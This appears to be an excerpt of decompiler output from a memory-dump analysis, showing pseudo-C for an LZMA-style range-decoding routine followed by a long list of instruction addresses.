											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                              0x00000000
                                              0x0040663c
                                              0x0040663c
                                              0x00406640
                                              0x00406669
                                              0x00406673
                                              0x00406642
                                              0x0040664b
                                              0x00406658
                                              0x0040665b
                                              0x0040699f
                                              0x0040699f
                                              0x004069a2
                                              0x004069a2
                                              0x004069a2
                                              0x004069a8
                                              0x004069ae
                                              0x004069b4
                                              0x004069ce
                                              0x004069d1
                                              0x004069d7
                                              0x004069e2
                                              0x004069e4
                                              0x004069b6
                                              0x004069b6
                                              0x004069c5
                                              0x004069c9
                                              0x004069c9
                                              0x004069ee
                                              0x00000000
                                              0x00000000
                                              0x004069f0
                                              0x004069f4
                                              0x00406ba3
                                              0x00406bb9
                                              0x00406bc1
                                              0x00406bc8
                                              0x00406bca
                                              0x00406bd1
                                              0x00406bd5
                                              0x00406bd5
                                              0x00406a00
                                              0x00406a07
                                              0x00406a0f
                                              0x00406a12
                                              0x00406a15
                                              0x00406a15
                                              0x00406a1b
                                              0x00406a1b
                                              0x004061b7
                                              0x004061b7
                                              0x004061b7
                                              0x004061c0
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x00000000
                                              0x004061d1
                                              0x00000000
                                              0x00000000
                                              0x004061da
                                              0x004061dd
                                              0x004061e0
                                              0x004061e4
                                              0x00000000
                                              0x00000000
                                              0x004061ea
                                              0x004061ed
                                              0x004061ef
                                              0x004061f0
                                              0x004061f3
                                              0x004061f5
                                              0x004061f6
                                              0x004061f8
                                              0x004061fb
                                              0x00406200
                                              0x00406205
                                              0x0040620e
                                              0x00406221
                                              0x00406224
                                              0x00406230
                                              0x00406258
                                              0x0040625a
                                              0x00406268
                                              0x00406268
                                              0x0040626c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040625c
                                              0x0040625c
                                              0x0040625f
                                              0x00406260
                                              0x00406260
                                              0x00000000
                                              0x0040625c
                                              0x00406236
                                              0x0040623b
                                              0x0040623b
                                              0x00406244
                                              0x0040624c
                                              0x0040624f
                                              0x00000000
                                              0x00406255
                                              0x00406255
                                              0x00000000
                                              0x00406255
                                              0x00000000
                                              0x00406272
                                              0x00406272
                                              0x00406276
                                              0x00406b22
                                              0x00000000
                                              0x00406b22
                                              0x0040627f
                                              0x0040628f
                                              0x00406292
                                              0x00406295
                                              0x00406295
                                              0x00406295
                                              0x00406298
                                              0x0040629c
                                              0x00000000
                                              0x00000000
                                              0x0040629e
                                              0x004062a4
                                              0x004062ce
                                              0x004062d4
                                              0x004062db
                                              0x00000000
                                              0x004062db
                                              0x004062aa
                                              0x004062ad
                                              0x004062b2
                                              0x004062b2
                                              0x004062bd
                                              0x004062c5
                                              0x004062c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040630d
                                              0x00406313
                                              0x00406316
                                              0x00406323
                                              0x0040632b
                                              0x0040699f
                                              0x00000000
                                              0x00000000
                                              0x004062e2
                                              0x004062e2
                                              0x004062e6
                                              0x00406b31
                                              0x00000000
                                              0x00406b31
                                              0x004062f2
                                              0x004062fd
                                              0x004062fd
                                              0x004062fd
                                              0x00406300
                                              0x00406303
                                              0x00406306
                                              0x0040630b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004069a2
                                              0x004069a2
                                              0x004069a8
                                              0x004069ae
                                              0x004069b4
                                              0x004069ce
                                              0x004069d1
                                              0x004069d7
                                              0x004069e2
                                              0x004069e4
                                              0x004069b6
                                              0x004069b6
                                              0x004069c5
                                              0x004069c9
                                              0x004069c9
                                              0x004069ee
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406333
                                              0x00406335
                                              0x00406338
                                              0x004063a9
                                              0x004063ac
                                              0x004063af
                                              0x004063b6
                                              0x004063c0
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x0040699f
                                              0x0040633a
                                              0x0040633e
                                              0x00406341
                                              0x00406343
                                              0x00406346
                                              0x00406349
                                              0x0040634b
                                              0x0040634e
                                              0x00406350
                                              0x00406355
                                              0x00406358
                                              0x0040635b
                                              0x0040635f
                                              0x00406366
                                              0x00406369
                                              0x00406370
                                              0x00406374
                                              0x0040637c
                                              0x0040637c
                                              0x0040637c
                                              0x00406376
                                              0x00406376
                                              0x00406376
                                              0x0040636b
                                              0x0040636b
                                              0x0040636b
                                              0x00406380
                                              0x00406383
                                              0x004063a1
                                              0x004063a3
                                              0x00000000
                                              0x00406385
                                              0x00406385
                                              0x00406388
                                              0x0040638b
                                              0x0040638e
                                              0x00406390
                                              0x00406390
                                              0x00406390
                                              0x00406393
                                              0x00406396
                                              0x00406398
                                              0x00406399
                                              0x0040639c
                                              0x00000000
                                              0x0040639c
                                              0x00000000
                                              0x004065d2
                                              0x004065d6
                                              0x004065f4
                                              0x004065f7
                                              0x004065fe
                                              0x00406601
                                              0x00406604
                                              0x00406607
                                              0x0040660a
                                              0x0040660d
                                              0x0040660f
                                              0x00406616
                                              0x00406617
                                              0x00406619
                                              0x0040661c
                                              0x0040661f
                                              0x00406622
                                              0x00406622
                                              0x00406627
                                              0x00000000
                                              0x00406627
                                              0x004065d8
                                              0x004065db
                                              0x004065de
                                              0x004065e8
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040667f
                                              0x00406683
                                              0x00000000
                                              0x00000000
                                              0x00406689
                                              0x0040668d
                                              0x00000000
                                              0x00000000
                                              0x00406693
                                              0x00406695
                                              0x00406699
                                              0x00406699
                                              0x0040669c
                                              0x004066a0
                                              0x00000000
                                              0x00000000
                                              0x004066f0
                                              0x004066f4
                                              0x004066fb
                                              0x004066fe
                                              0x00406701
                                              0x0040670b
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x0040699f
                                              0x004066f6
                                              0x00000000
                                              0x00000000
                                              0x00406717
                                              0x0040671b
                                              0x00406722
                                              0x00406725
                                              0x00406728
                                              0x0040671d
                                              0x0040671d
                                              0x0040671d
                                              0x0040672b
                                              0x0040672e
                                              0x00406731
                                              0x00406731
                                              0x00406734
                                              0x00406737
                                              0x0040673a
                                              0x0040673a
                                              0x0040673d
                                              0x00406744
                                              0x00406749
                                              0x00000000
                                              0x00000000
                                              0x004067d7
                                              0x004067d7
                                              0x004067db
                                              0x00406b79
                                              0x00000000
                                              0x00406b79
                                              0x004067e1
                                              0x004067e4
                                              0x004067e7
                                              0x004067eb
                                              0x004067ee
                                              0x004067f4
                                              0x004067f6
                                              0x004067f6
                                              0x004067f6
                                              0x004067f9
                                              0x004067fc
                                              0x00000000
                                              0x00000000
                                              0x004063cc
                                              0x004063cc
                                              0x004063d0
                                              0x00406b3d
                                              0x00000000
                                              0x00406b3d
                                              0x004063d6
                                              0x004063d9
                                              0x004063dc
                                              0x004063e0
                                              0x004063e3
                                              0x004063e9
                                              0x004063eb
                                              0x004063eb
                                              0x004063eb
                                              0x004063ee
                                              0x004063f1
                                              0x004063f1
                                              0x004063f4
                                              0x004063f7
                                              0x00000000
                                              0x00000000
                                              0x004063fd
                                              0x00406403
                                              0x00000000
                                              0x00000000
                                              0x00406409
                                              0x00406409
                                              0x0040640d
                                              0x00406410
                                              0x00406413
                                              0x00406416
                                              0x00406419
                                              0x0040641a
                                              0x0040641d
                                              0x0040641f
                                              0x00406425
                                              0x00406428
                                              0x0040642b
                                              0x0040642e
                                              0x00406431
                                              0x00406434
                                              0x00406437
                                              0x00406453
                                              0x00406456
                                              0x00406459
                                              0x0040645c
                                              0x00406463
                                              0x00406467
                                              0x00406469
                                              0x0040646d
                                              0x00406439
                                              0x00406439
                                              0x0040643d
                                              0x00406445
                                              0x0040644a
                                              0x0040644c
                                              0x0040644e
                                              0x0040644e
                                              0x00406470
                                              0x00406477
                                              0x0040647a
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406485
                                              0x00406485
                                              0x00406489
                                              0x00406b49
                                              0x00000000
                                              0x00406b49
                                              0x0040648f
                                              0x00406492
                                              0x00406495
                                              0x00406499
                                              0x0040649c
                                              0x004064a2
                                              0x004064a4
                                              0x004064a4
                                              0x004064a4
                                              0x004064a7
                                              0x004064aa
                                              0x004064aa
                                              0x004064aa
                                              0x004064b0
                                              0x00000000
                                              0x00000000
                                              0x004064b2
                                              0x004064b5
                                              0x004064b8
                                              0x004064bb
                                              0x004064be
                                              0x004064c1
                                              0x004064c4
                                              0x004064c7
                                              0x004064ca
                                              0x004064cd
                                              0x004064d0
                                              0x004064e8
                                              0x004064eb
                                              0x004064ee
                                              0x004064f1
                                              0x004064f1
                                              0x004064f4
                                              0x004064f8
                                              0x004064fa
                                              0x004064d2
                                              0x004064d2
                                              0x004064da
                                              0x004064df
                                              0x004064e1
                                              0x004064e3
                                              0x004064e3
                                              0x004064fd
                                              0x00406504
                                              0x00406507
                                              0x00000000
                                              0x00406509
                                              0x00000000
                                              0x00406509
                                              0x00406507
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x00000000
                                              0x00000000
                                              0x00406549
                                              0x00406549
                                              0x0040654d
                                              0x00406b55
                                              0x00000000
                                              0x00406b55
                                              0x00406553
                                              0x00406556
                                              0x00406559
                                              0x0040655d
                                              0x00406560
                                              0x00406566
                                              0x00406568
                                              0x00406568
                                              0x00406568
                                              0x0040656b
                                              0x0040656e
                                              0x0040656e
                                              0x00406574
                                              0x00406512
                                              0x00406512
                                              0x00406515
                                              0x00000000
                                              0x00406515
                                              0x00406576
                                              0x00406576
                                              0x00406579
                                              0x0040657c
                                              0x0040657f
                                              0x00406582
                                              0x00406585
                                              0x00406588
                                              0x0040658b
                                              0x0040658e
                                              0x00406591
                                              0x00406594
                                              0x004065ac
                                              0x004065af
                                              0x004065b2
                                              0x004065b5
                                              0x004065b5
                                              0x004065b8
                                              0x004065bc
                                              0x004065be
                                              0x00406596
                                              0x00406596
                                              0x0040659e
                                              0x004065a3
                                              0x004065a5
                                              0x004065a7
                                              0x004065a7
                                              0x004065c1
                                              0x004065c8
                                              0x004065cb
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x0040685a
                                              0x0040685a
                                              0x0040685e
                                              0x00406b85
                                              0x00000000
                                              0x00406b85
                                              0x00406864
                                              0x00406867
                                              0x0040686a
                                              0x0040686e
                                              0x00406871
                                              0x00406877
                                              0x00406879
                                              0x00406879
                                              0x00406879
                                              0x0040687c
                                              0x00000000
                                              0x00000000
                                              0x0040662a
                                              0x0040662a
                                              0x0040662d
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x00000000
                                              0x00406969
                                              0x0040696d
                                              0x0040698f
                                              0x00406992
                                              0x0040699c
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x0040699f
                                              0x0040696f
                                              0x00406972
                                              0x00406976
                                              0x00406979
                                              0x00406979
                                              0x0040697c
                                              0x00000000
                                              0x00000000
                                              0x00406a26
                                              0x00406a2a
                                              0x00406a48
                                              0x00406a48
                                              0x00406a48
                                              0x00406a4f
                                              0x00406a56
                                              0x00406a5d
                                              0x00406a5d
                                              0x00000000
                                              0x00406a5d
                                              0x00406a2c
                                              0x00406a2f
                                              0x00406a32
                                              0x00406a35
                                              0x00406a3c
                                              0x00406980
                                              0x00406980
                                              0x00406983
                                              0x00000000
                                              0x00000000
                                              0x00406b17
                                              0x00406b1a
                                              0x00406a1b
                                              0x00000000
                                              0x00000000
                                              0x00406751
                                              0x00406753
                                              0x0040675a
                                              0x0040675b
                                              0x0040675d
                                              0x00406760
                                              0x00000000
                                              0x00000000
                                              0x00406768
                                              0x0040676b
                                              0x0040676e
                                              0x00406770
                                              0x00406772
                                              0x00406772
                                              0x00406773
                                              0x00406776
                                              0x0040677d
                                              0x00406780
                                              0x0040678e
                                              0x00000000
                                              0x00000000
                                              0x00406a64
                                              0x00406a64
                                              0x00406a67
                                              0x00406a6e
                                              0x00000000
                                              0x00000000
                                              0x00406a73
                                              0x00406a73
                                              0x00406a77
                                              0x00406baf
                                              0x00000000
                                              0x00406baf
                                              0x00406a7d
                                              0x00406a80
                                              0x00406a83
                                              0x00406a87
                                              0x00406a8a
                                              0x00406a90
                                              0x00406a92
                                              0x00406a92
                                              0x00406a92
                                              0x00406a95
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a9b
                                              0x00406a9b
                                              0x00406a9f
                                              0x00406aff
                                              0x00406b02
                                              0x00406b07
                                              0x00406b08
                                              0x00406b0a
                                              0x00406b0c
                                              0x00406b0f
                                              0x00406a1b
                                              0x00406a1b
                                              0x00000000
                                              0x00406a21
                                              0x00406a1b
                                              0x00406aa1
                                              0x00406aa7
                                              0x00406aaa
                                              0x00406aad
                                              0x00406ab0
                                              0x00406ab3
                                              0x00406ab6
                                              0x00406ab9
                                              0x00406abc
                                              0x00406abf
                                              0x00406ac2
                                              0x00406adb
                                              0x00406ade
                                              0x00406ae1
                                              0x00406ae4
                                              0x00406ae8
                                              0x00406aea
                                              0x00406aea
                                              0x00406aeb
                                              0x00406aee
                                              0x00406ac4
                                              0x00406ac4
                                              0x00406acc
                                              0x00406ad1
                                              0x00406ad3
                                              0x00406ad6
                                              0x00406ad6
                                              0x00406af1
                                              0x00406af8
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406796
                                              0x00406799
                                              0x004067cf
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x00406902
                                              0x00406902
                                              0x00406905
                                              0x00406907
                                              0x00406b91
                                              0x00000000
                                              0x00406b91
                                              0x0040690d
                                              0x00406910
                                              0x00000000
                                              0x00000000
                                              0x00406916
                                              0x0040691a
                                              0x0040691d
                                              0x0040691d
                                              0x0040691d
                                              0x00000000
                                              0x0040691d
                                              0x0040679b
                                              0x0040679d
                                              0x0040679f
                                              0x004067a1
                                              0x004067a4
                                              0x004067a5
                                              0x004067a7
                                              0x004067a9
                                              0x004067ac
                                              0x004067af
                                              0x004067c5
                                              0x004067ca
                                              0x00406802
                                              0x00406802
                                              0x00406806
                                              0x00406832
                                              0x00406834
                                              0x0040683b
                                              0x0040683e
                                              0x00406841
                                              0x00406841
                                              0x00406846
                                              0x00406846
                                              0x00406848
                                              0x0040684b
                                              0x00406852
                                              0x00406855
                                              0x00406882
                                              0x00406882
                                              0x00406885
                                              0x00406888
                                              0x004068fc
                                              0x004068fc
                                              0x004068fc
                                              0x00000000
                                              0x004068fc
                                              0x0040688a
                                              0x00406890
                                              0x00406893
                                              0x00406896
                                              0x00406899
                                              0x0040689c
                                              0x0040689f
                                              0x004068a2
                                              0x004068a5
                                              0x004068a8
                                              0x004068ab
                                              0x004068c4
                                              0x004068c6
                                              0x004068c9
                                              0x004068ca
                                              0x004068cd
                                              0x004068cf
                                              0x004068d2
                                              0x004068d4
                                              0x004068d6
                                              0x004068d9
                                              0x004068db
                                              0x004068de
                                              0x004068e2
                                              0x004068e4
                                              0x004068e4
                                              0x004068e5
                                              0x004068e8
                                              0x004068eb
                                              0x004068ad
                                              0x004068ad
                                              0x004068b5
                                              0x004068ba
                                              0x004068bc
                                              0x004068bf
                                              0x004068bf
                                              0x004068ee
                                              0x004068f5
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x00000000
                                              0x004068f7
                                              0x00000000
                                              0x004068f7
                                              0x004068f5
                                              0x00406808
                                              0x0040680b
                                              0x0040680d
                                              0x00406810
                                              0x00406813
                                              0x00406816
                                              0x00406818
                                              0x0040681b
                                              0x0040681e
                                              0x0040681e
                                              0x00406821
                                              0x00406821
                                              0x00406824
                                              0x0040682b
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x00000000
                                              0x0040682d
                                              0x00000000
                                              0x0040682d
                                              0x0040682b
                                              0x004067b1
                                              0x004067b4
                                              0x004067b6
                                              0x004067b9
                                              0x00000000
                                              0x00000000
                                              0x00406518
                                              0x00406518
                                              0x0040651c
                                              0x00406b61
                                              0x00000000
                                              0x00406b61
                                              0x00406522
                                              0x00406525
                                              0x00406528
                                              0x0040652b
                                              0x0040652e
                                              0x00406531
                                              0x00406534
                                              0x00406536
                                              0x00406539
                                              0x0040653c
                                              0x0040653f
                                              0x00406541
                                              0x00406541
                                              0x00406541
                                              0x00000000
                                              0x00000000
                                              0x004066a3
                                              0x004066a3
                                              0x004066a7
                                              0x00406b6d
                                              0x00000000
                                              0x00406b6d
                                              0x004066ad
                                              0x004066b0
                                              0x004066b3
                                              0x004066b6
                                              0x004066b8
                                              0x004066b8
                                              0x004066b8
                                              0x004066bb
                                              0x004066be
                                              0x004066c1
                                              0x004066c4
                                              0x004066c7
                                              0x004066ca
                                              0x004066cb
                                              0x004066cd
                                              0x004066cd
                                              0x004066cd
                                              0x004066d0
                                              0x004066d3
                                              0x004066d6
                                              0x004066d9
                                              0x004066d9
                                              0x004066d9
                                              0x004066dc
                                              0x004066de
                                              0x004066de
                                              0x00000000
                                              0x00000000
                                              0x00406920
                                              0x00406920
                                              0x00406920
                                              0x00406924
                                              0x00000000
                                              0x00000000
                                              0x0040692a
                                              0x0040692d
                                              0x00406930
                                              0x00406933
                                              0x00406935
                                              0x00406935
                                              0x00406935
                                              0x00406938
                                              0x0040693b
                                              0x0040693e
                                              0x00406941
                                              0x00406944
                                              0x00406947
                                              0x00406948
                                              0x0040694a
                                              0x0040694a
                                              0x0040694a
                                              0x0040694d
                                              0x00406950
                                              0x00406953
                                              0x00406956
                                              0x00406959
                                              0x0040695d
                                              0x0040695f
                                              0x00406962
                                              0x00000000
                                              0x00406964
                                              0x004066e1
                                              0x004066e1
                                              0x00000000
                                              0x004066e1
                                              0x00406962
                                              0x00406b97
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x00406bce
                                              0x00406bce
                                              0x00000000
                                              0x00406bce
                                              0x00406a1b
                                              0x004069a2
                                              0x0040699f

                                              Memory Dump Source
